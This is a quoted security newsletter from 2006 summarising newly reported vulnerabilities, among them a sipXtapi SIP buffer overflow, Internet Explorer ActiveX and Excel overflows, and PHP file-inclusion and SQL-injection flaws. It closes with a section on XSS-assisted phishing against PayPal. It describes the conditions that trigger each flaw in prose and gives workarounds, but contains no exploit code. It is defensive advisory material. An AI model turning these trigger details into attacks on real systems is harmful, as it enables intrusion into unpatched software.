>
> This week's biggest and most critical new vulnerability is one that
> affects VOIP and AOL Triton and other important internet services (#1
> below). The software's largely unknown name, SipXtapi, belies the
> breadth of its use, and the vulnerability can be exploited
> very simply.
> Also at risk this week are users of Microsoft Internet Explorer, Excel
> and Windows Explorer. (#2, #5, and #6 below)
>
> *************************
> Widely-Deployed Software
> *************************
>
> (1) CRITICAL: SIPfoundry sipXtapi Buffer Overflow
> Affected:
> sipXtapi library versions compiled before 24-Mar-2006
> PingTel products compiled against those versions of the library
> AOL Triton products compiled against those versions of the library
>
> Details: SIPfoundry is an international software community
> dedicated to
> accelerating the adoption of SIP (Session Initiation Protocol)-based
> VoIP solutions. One of SIPfoundry's products, the sipXtapi library, is
> used by multiple cross-platform VoIP applications. This
> library contains
> a buffer overflow that can be triggered by sending a "CSeq" SIP header
> field larger than 24 bytes. An attacker can exploit the flaw
> to execute
> arbitrary code with the privileges of the user running the affected
> application. Note that several common user applications,
> including AOL's
> Triton messaging application, are compiled using vulnerable
> versions of
> the library. Exploit code for this vulnerability has been publicly
> posted.
>
> Status: SIPfoundry confirmed, updates available. Updates from PingTel
> and AOL are also available.
>
> References:
> Posting by Michael Thumann
>
> 0160.html
> SIPfoundry sipXtapi Home Page
>
> SIPfoundry Home Page
>
> SecurityFocus BID
>
>
> ****************************************************************
>
> (2) HIGH: Internet Explorer "Internet.HHCtrl" ActiveX Heap Overflow
> Affected:
> Microsoft Windows XP Service Pack 2; other versions may be affected
>
> Details: Internet Explorer contains a heap-based buffer overflow that
> can be triggered after instantiating the Windows Help and Support
> ActiveX control (hhctrl.ocx). The problem arises because setting the
> "Image" property of this ActiveX component results in a small heap
> overflow. A malicious webpage or an HTML email may exploit the flaw to
> execute arbitrary code with the privileges of the logged-on user. The
> technical details along with a proof-of-concept have been publicly
> posted. This flaw was reported by a researcher who plans to release a
> new flaw everyday for the month of July in various browsers. The
> researcher has also reported other DoS vulnerabilities in IE.
>
> Status: Microsoft has not confirmed, no updates available. A
> workaround
> is to set the killbit for the hhctrl.ocx ActiveX control with the
> following UUID: 41B23C28-488E-4E5C-ACE2-BB0BBABE99E8. Note
> that Windows
> Help and Support Center may not function properly if this kill bit is
> set.
>
> Council Site Actions: All responding council sites are waiting on
> additional information from the vendor.
>
> References:
> Browser Fun Posting by H.D. Moore
>
>
> mage-property.html
> SecurityFocus BID
>
>
> ****************************************************************
>
> (5) MODERATE: Microsoft Excel "Style" Processing Overflow (0-day)
> Affected:
> Microsoft Excel 2000/XP/2003 (Asian languages editions only)
>
> Details: Another 0-day buffer overflow vulnerability has been reported
> in versions of Microsoft Excel localized into certain Asian languages
> (e.g. Chinese). The overflow is triggered by an Excel document with an
> overlong "style" string. By tricking a user into opening a
> specially-crafted file, an attacker could execute arbitrary code with
> the privileges of the logged-on user. However, user interaction is
> required to exploit this flaw. In case of Excel XP and 2003, the user
> must repair the document using Excel's repair feature whereas
> Excel 2000
> requires that the user click on the "Style" option. A proof-of-concept
> has been publicly posted.
>
> Status: Microsoft has not confirmed, no updates available.
>
> Council Site Actions: responding council sites are waiting on
> additional
> information from the vendor.
>
> References:
> Posting by nanika
>
> Proof-of-Concept
>
> SecurityFocus BID
>
>
> ****************************************************************
>
> (6) LOW: Microsoft Windows Explorer URL File Format Overflow
> Affected:
> Microsoft Windows XP/2003
>
> Details: Microsoft Windows Explorer, the primary user interface shell
> for the Microsoft Windows operating system, is prone to a file format
> vulnerability during the parsing of "Internet Shortcut" (.url) files.
> By tricking a user into viewing a folder containing a
> specially-crafted
> shortcut file, an attacker can crash the Windows Explorer session. It
> is currently unknown as to whether code execution is
> possible. Note that
> only viewing the folder containing the shortcut file is necessary;
> therefore, simply placing the shortcut file on the desktop or clicking
> a link to a shared folder containing such a file is all that is
> necessary for exploitation.
>
> Status: Microsoft has not confirmed, no updates available.
>
> Council Site Actions: responding council sites are waiting on
> additional
> information from the vendor.
>
> References:
> Posting by nanika@xxxxxxxxxx:
>
> SecurityFocus BID
> Not yet available.
>
> **************
> Other Software
> **************
>
> (7) HIGH: Multiple Products PHP File Inclusion Vulnerabilities
> Affected:
> vBulletin version 3.5.4 and prior
> Mambo Galleria Module version 1.0 and prior
> WebDesignHQ SiteBuilder-FX version 3.x
> Stud.IP versions 1.3.0-2 and prior
> BLOG:CMS versions 4.1.0 and prior
> Plume-CMS version 1.0.4 and prior
> TWiki versions version 01-Dec-2000 and later
>
> Description: The following popular software packages
> reportedly contain
> PHP remote file include vulnerabilities: vBulletin, Mambo Galleria,
> WebDesignHQ, Stud.IP, BLOG:CMS, Plume-CMS, and TWiki. These flaws can
> be exploited by a remote attacker to run arbitrary PHP code on the
> webserver hosting the vulnerable software packages. The postings show
> how to craft the malicious HTTP requests to exploit the flaws.
>
> Status:
> vBulletin has not confirmed, no updates available.
> Mambo has not confirmed, no updates available.
> SiteBuilder has not confirmed, no updates available.
> Stud.IP has not confirmed, no updates available.
> BLOG:CMS has not confirmed, no updates available.
> Plume-CMS has not confirmed, no updates available.
> TWiki confirmed, updates available.
>
> Note that, with the exception of the TWiki vulnerability, all of these
> vulnerabilities require that the PHP "register_globals" option be
> enabled. The "register_globals" option is disabled by default in PHP
> version 4.2.0 and later. However, many sites enable this
> option, and at
> least the Stud.IP package requires that this option be enabled. Users
> are advised to disable the "register_globals" option if possible, and
> run web server software under a low-privilege account.
>
> Council Site Actions: The affected software and/or
> configuration are not
> in production or widespread use, or are not officially
> supported at any
> of the council sites. They reported that no action was necessary.
>
> References:
> PLDsoft Posting by M4K3 (vBulletin)
>
> Posting by CarcaBotx (vBulletin)
>
> vBulletin Home Page
>
> Posting by ineal (Mambo Galleria)
>
> Mambo Home Page
>
> SecurityFocus BID (Mambo Galleria)
>
> Secunia Security Advisory (SiteBuilder-FX)
>
> WebDesignHQ Home Page
>
> Posting by Hamid Ebadi (Stud.IP)
>
> Stud.IP Home Page
>
> Posting by Ellipsis Security (BLOG:CMS)
>
> BLOG:CMS Home Page
>
> SecurityFocus BID (BLOG:CMS)
>
> Posting by KARKOR23 (Plume-CMS)
>
> Plume-CMS Home Page
>
> SecurityFocus BID (Plume-CMS)
>
> Posting by Peter Thoeny (TWiki)
>
> TWiki Security Advisory
>
> TWikki Home Page
>
>
> ****************************************************************
>
> (8) HIGH: Multiple Products SQL Injection Vulnerabilities
> Affected:
> BLOG:CMS version 4.1.0 and possibly prior
> Invision Power Board versions 1.x, 2.x, and 3.x Final
> Kyberna AG ky2help 3.2 and possibly others
>
> Details: Multiple web-based applications contain SQL injection
> vulnerabilities. Each of these attacks would allow complete access to
> the database providing backend services to the affected application.
> Depending on configuration, access could also be granted to other
> databases or to the hosting system. With the exception of the ky2help
> vulnerability, none of these attacks require authentication. The
> BLOG:CMS vulnerability requires that the "magic_quotes_gpc" PHP option
> be disabled; it is enabled by default.
>
> Status:
> BLOG:CMS has not confirmed, no updates available.
> Invision Power Board has not confirmed, no updates available.
> Kyberna has confirmed, updates available.
>
> Council Site Actions: The affected software and/or
> configuration are not
> in production or widespread use, or are not officially
> supported at any
> of the council sites. They reported that no action was necessary.
>
> References:
> Posting by Ellipsis Security (BLOG:CMS)
>
> BLOG:CMS Home Page
>
> SecurityFocus BID (BLOG:CMS)
>
> Posting by Crazy.Cracker (Invision Power Board)
>
> Posting by Breeeeh (Invision Power Board)
>
> Invision Power Board Home Page
>
> SecurityFocus BID (Invision Power Board)
>
> SCIP Advisory (ky2help)
>
>
> Kyberna Home Page
>
> SecurityFocus BID (ky2help)
>
>
> ****************************************************************
>
> **********
> Exploits
> **********
>
> (11) Microsoft Word HLINK.DLL Exploit
>
> Description: The Microsoft Windows HLINK.DLL vulnerability
> described in
> a previous @RISK newsletter posting has a new exploit available that
> used Word as an attack vector. The previously posted exploits used
> Microsoft Excel as an attack vector. Note that user
> interaction is still
> required to leverage the flaw. Users are advised to not open documents
> from untrusted sources.
>
> References:
> Posting by "SYS 49152"
>
> 0152.html
> Previous @RISK Newsletter Posting
>
>
> ****************************************************************
> 06.27.1 CVE: Not Available
> Platform: Windows
> Title: Microsoft Internet Explorer HHCtrl ActiveX Control Memory
> Corruption
> Description: Internet Explorer is exposed to a memory corruption
> vulnerability. This is related to the handling of the Internet.HHCtrl
> image property, which results in heap memory corruption. Internet
> Explorer versions 6.0 SP1 and earlier are affected.
> Ref:
>
> mage-property.html
> ______________________________________________________________________
>
> 06.27.2 CVE: Not Available
> Platform: Windows
> Title: Internet Explorer Structured Graphics Control Denial of Service
> Description: Microsoft Internet Explorer is exposed to a denial of
> service issue. It fails to handle malicious ActiveX controls properly.
> This issue is triggered when an attacker convinces a victim user to
> activate a malicious ActiveX control. Microsoft Internet Explorer 6.0
> versions SP2 and earlier are affected.
> Ref:
>
> cscontrol.html
> ______________________________________________________________________
>
> 06.27.3 CVE: CVE-2006-3059
> Platform: Microsoft Office
> Title: Excel Style Handling and Repair Remote Code Execution
> Description: Microsoft Excel is vulnerable to a remote code execution
> issue due to insufficient handling of malformed XLS files that contain
> long styles. Visit the referenced link for further details.
> Ref:
> ______________________________________________________________________
>
> 06.27.4 CVE: Not Available
> Platform: Other Microsoft Products
> Title: Internet Explorer 7 Denial of Service
> Description: Microsoft Internet Explorer 7 is vulnerable to a denial
> of service issue when parsing HTML content containing numerous nested
> "applet" tags. Microsoft Internet Explorer versions 7.0 beta3 and
> earlier are vulnerable.
> Ref:
> ______________________________________________________________________
>
> 06.27.5 CVE: Not Available
> Platform: Other Microsoft Products
> Title: Microsoft Internet Explorer OutlookExpress.AddressBook Denial
> of Service
> Description: Internet Explorer is prone to a denial of service
> vulnerability. This issue occurs when the browser loads a non-ActiveX
> COM object. Reports indicate that the "OutlookExpress.AddressBook" COM
> object may be used to trigger this issue.
> Ref:
> ______________________________________________________________________
>
> 06.27.6 CVE: Not Available
> Platform: Other Microsoft Products
> Title: Internet Explorer Href Title Denial of Service
> Description: Microsoft Internet Explorer is prone to a denial of
> service issue due to an error in processing a HTML "href" tag with a
> title that is larger than one thousand characters. Please see the
> attached advisory for details.
> Ref:
> ______________________________________________________________________
>
> 06.27.7 CVE: Not Available
> Platform: Other Microsoft Products
> Title: Internet Explorer Explorer.exe Denial of Service
> Description: Microsoft Internet Explorer is vulnerable to a denial of
> service issue because the application fails to handle malicious ".url"
> files properly while parsing the URI file. All versions of Microsoft
> Internet Explorer are vulnerable.
> Ref:
> ______________________________________________________________________
>
> 06.27.8 CVE: Not Available
> Platform: Other Microsoft Products
> Title: Microsoft Internet Explorer Table Frameset Denial of Service
> Description: Internet Explorer is prone to a denial of service
> vulnerability. The attacker supplied code at the attacker's site will
> cause Internet Explorer to create a Frameset inside a Table using the
> "appendChild" function. This can lead to dereferencing a NULL pointer.
> As a result, Internet Explorer will crash, effectively denying service
> to legitimate users.
> Ref:
> ______________________________________________________________________
>
> 06.27.10 CVE: Not Available
> Platform: Third Party Windows Apps
> Title: PatchLink Update Server Arbitrary File Overwrite
> Description: PatchLink Update Server is a patch and vulnerability
> management solution. It is vulnerable to a remote file overwrite issue
> due to insufficient sanitization of user-supplied input to the
> "nwupload.asp" script. PatchLink Update versions 6.2 and earlier are
> vulnerable.
> Ref:
> ______________________________________________________________________
>
> 06.27.11 CVE: Not Available
> Platform: Third Party Windows Apps
> Title: Internet Explorer ADODB.Recordset Filter Property Denial of
> Service
> Description: Microsoft Internet Explorer is vulnerable to a denial of
> service issue when the browser loads a non-ActiveX COM object.
> Microsoft Internet Explorer versions 6.0 SP1 and 6.0 are vulnerable.
> Ref:
>
> ilter-property.html
> ______________________________________________________________________
>
> 06.27.12 CVE: Not Available
> Platform: Third Party Windows Apps
> Title: Zone Labs ZoneAlarm Registry Key Local Denial of Service
> Description: Zone Labs ZoneAlarm Internet Security Suite is a security
> software package. It is exposed to a denial of service vulnerability
> due to a failure in the application to properly handle exceptional
> conditions. ZoneAlarm Security Suite versions 6.5.722 and 6.1.737 are
> affected.
> Ref:
>
> -protection-of-registry-key-VETFDDNT-Enum.php
> ______________________________________________________________________
>
> 06.27.15 CVE: Not Available
> Platform: Third Party Windows Apps
> Title: RARLAB WinRAR Self-Extracting Archive Buffer Overflow
> Description: RARLAB WinRAR is a compression utility capable of reading
> and writing files using several different archival formats. It is
> prone to a client side buffer overflow vulnerability. This issue
> arises when processing a malicious self extracting archive (.sfx) file
> having a large comment as part of the archive. WinRAR versions 3.60
> and earlier are affected.
> Ref:
> ______________________________________________________________________
>
> 06.27.22 CVE: Not Available
> Platform: Linux
> Title: Linux Kernel Netfilter Conntrack_Proto_SCTP.C Denial of Service
> Description: The Linux kernel netfilter module is prone to a denial of
> service vulnerability. The problem occurs in the
> "ipv4/netfilter/ip_conntrack_proto_sctp.c" and
> "netfilter/nf_conntrack_proto_sctp.c" scripts. Specifically, when a
> packet without any chunks is received the newconntrack variable in
> sctp_packet contains an out of bounds value. That value is used to
> look up a pointer from the array of timeouts, which is then
> dereferenced. This results in a crash.
> Ref:
> ______________________________________________________________________
>
>
> 06.27.24 CVE: CVE-2006-2935
> Platform: Linux
> Title: Linux Kernel CD-ROM Driver Local Buffer Overflow
> Description: The Linux kernel is susceptible to a local buffer
> overflow issue. It fails to properly bounds check user-supplied input
> before using it in a memory copy operation. Linux kernel versions
> 2.6.17.3 and earlier are affected.
> Ref:
> ______________________________________________________________________
>
> 06.27.29 CVE: Not Available
> Platform: Unix
> Title: Linux Kernel PRCTL Core Dump Handling Privilege Escalation
> Description: Linux kernel is exposed to a local privilege escalation
> issue. This issue affects "prctl" because the application handles core
> dump files in an insecure manner. Linux kernel versions 2.6.17.3 and
> earlier are vulnerable.
> Ref:
> ______________________________________________________________________
>
> 06.27.30 CVE: Not Available
> Platform: Cross Platform
> Title: Opera Document Stylesheet Denial of Service
> Description: Opera is exposed to a denial of service issue due to a
> failure in the application to properly handle user-supplied input.
> Opera Web Browser version 9 is affected.
> Ref:
> ______________________________________________________________________
>
> 06.27.31 CVE: Not Available
> Platform: Cross Platform
> Title: LibWMF WMF File Handling Integer Overflow
> Description: LibWMF is a library that allows for reading and
> manipulation of Windows Metafile Format (WMF) files. It is vulnerable
> to an integer overflow issue in the "wmf_header_read()" function.
> LibWMF versions 0.2.8.4 and earlier are vulnerable.
> Ref:
> ______________________________________________________________________
>
> 06.27.33 CVE: Not Available
> Platform: Cross Platform
> Title: PatchLink Update Server Proxyreg.ASP Authentication Bypass
> Description: PatchLink Update Server is a patch and vulnerability
> management solution for medium and large enterprise networks. It is
> susceptible to a remote authentication bypass vulnerability due to
> improper verification of authentication credentials in the
> "proxyreg.asp" script. Malicious servers may be added to this proxy
> server list by a malicious user, which may then be used to distribute
> malicious code to unsuspecting roaming PatchLink client computers.
> Ref:
> ______________________________________________________________________
>
> 06.27.35 CVE: Not Available
> Platform: Cross Platform
> Title: Mozilla Firefox OuterHTML Redirection Handling Information
> Disclosure
> Description: Mozilla Firefox is exposed to an information disclosure
> vulnerability because it fails to properly enforce cross domain
> policies. Please refer to link below for further details. Mozilla
> Firefox version 1.5 beta 2 and earlier are affected.
> Ref:
> ______________________________________________________________________
>
> 06.27.36 CVE: CVE-2006-2199
> Platform: Cross Platform
> Title: OpenOffice Java Applet System Unauthorized Access
> Description: OpenOffice is a multiplatform office suite. It is
> vulnerable to an unauthorized acccess issue that allows a malicious
> Java applet to escape the sandbox and gain unauthorized access to a
> computer. OpenOffice version 2.0.3 resolves this issue.
> Ref:
> ______________________________________________________________________
>
> 06.27.37 CVE: Not Available
> Platform: Cross Platform
> Title: OpenOffice Arbitrary Macro Execution
> Description: OpenOffice is prone to a macro code injection
> vulnerability that allows attackers to gain unauthorized access to a
> vulnerable computer. This issue is due to a failure in the application
> to properly secure macros embedded in malicious documents, and does
> not require user interaction beyond accessing the file.
> Ref:
> ______________________________________________________________________
>
> 06.27.38 CVE: Not Available
> Platform: Cross Platform
> Title: OpenOffice XML File Format Buffer Overflow
> Description: OpenOffice is a multiplatform office suite. It is
> affected by an XML file format buffer overflow issues that allows
> attackers to gain unauthorized access to a vulnerable machine. Please
> see the attached advisory for a list of affected versions.
> Ref:
> ______________________________________________________________________
>
> 06.27.39 CVE: CVE-2006-0468
> Platform: Cross Platform
> Title: Communigate Pro Server Pop Denial of Service
> Description: CommuniGate Pro is an Internet messaging server. It is
> vulnerable to an unspecified denial of service issue. CommuniGate Pro
> Server versions 5.x are vulnerable.
> Ref:
> ______________________________________________________________________
>
> 06.27.42 CVE: Not Available
> Platform: Cross Platform
> Title: Gimp XCF_load_vector Function Buffer Overflow
> Description: Gimp is a free image manipulation application. The
> "xcf_load_vector()" function is vulnerable to a buffer overflow when
> the application processes a malicious image file. GIMP versions 2.2.11
> and earlier are vulnerable.
> Ref:
> ______________________________________________________________________
>
> Bonus Section: Lessons Learned The Hard Way in Web Application
> Vulnerabilities (a special section by SPI Dynamics).
>
> XSS Plus Phishing Comes of Age
> Last month, Paypal was hit with an emerging trend in phishing
> scams. An
> attacker used a Cross Site Scripting (XSS) vulnerability in paypal.com
> to inject their own HTML into web pages served from Paypal.
> By coupling
> phishing techniques with a web application vulnerability, the attacker
> created a phishing scenario that appeared legitimate and circumvented
> traditional anti-phishing defenses.
>
> The attack started by a mass email telling people they needed
> to update
> their Paypal account information. The email contained a link to
> paypal.com, with a XSS attack embedded in the URL. Unlike traditional
> phishing attacks which link to a fake website and attempt to hide the
> URL, this email did in fact link to the actual paypal.com
> host. When the
> user clicked on the link they visited SSL encrypted page on Paypal's
> site. Checking the hostname, the SSL certificate, or other common
> anti-phishing techniques all lead a victim to believe they were safe.
> By injecting their own HTML into the web page through the XSS
> vulnerability, the attacker was able to present anything they
> wanted to
> a victim and make them believe it was from Paypal. In this case, the
> injected HTML simply informed the user their account was
> deactivated and
> used JavaScript to redirect them to a 3rd party website where
> the actual
> information theft occurred.
>
> Paypal was extremely lucky that the XSS vulnerability wasn't properly
> exploited. The phisher could have injected a fake login form, added a
> keylogger, or completely rewritten the entire page with anything they
> wanted. XSS vulnerabilities can even been used to launch self
> propagating worms like the Yamanner worm or the MySpace.com worm.
> Instead the phisher merely redirected the victim to a 3rd
> party website
> just like a classic phishing attack.
>
> SPI Labs has been researching how XSS can amplify phishing attacks for
> quite some time. One of our researchers, Billy Hoffman, gave a well
> received presentation entitled ThePhuture of Phishing at the Toorcon
> Security conference in September 2005. This presentation includes an
> extensive guide on how to properly secure applications
> against XSS. SPI
> Labs has also created and released LineBreaker a proxy that
> detects and
> stop XSS+Phishing attacks. The both the presentation and program are
> available at
>
> shing.html
>
> What should you take away from all of this? Simple. XSS can greatly
> amplify the damage of a phishing attack by circumventing traditional
> defenses. XSS can have a number of very dangerous payloads, any one of
> which can steal personal information. Fortunately, XSS is also 100%
> preventable if developers perform proper input validation.
>
>
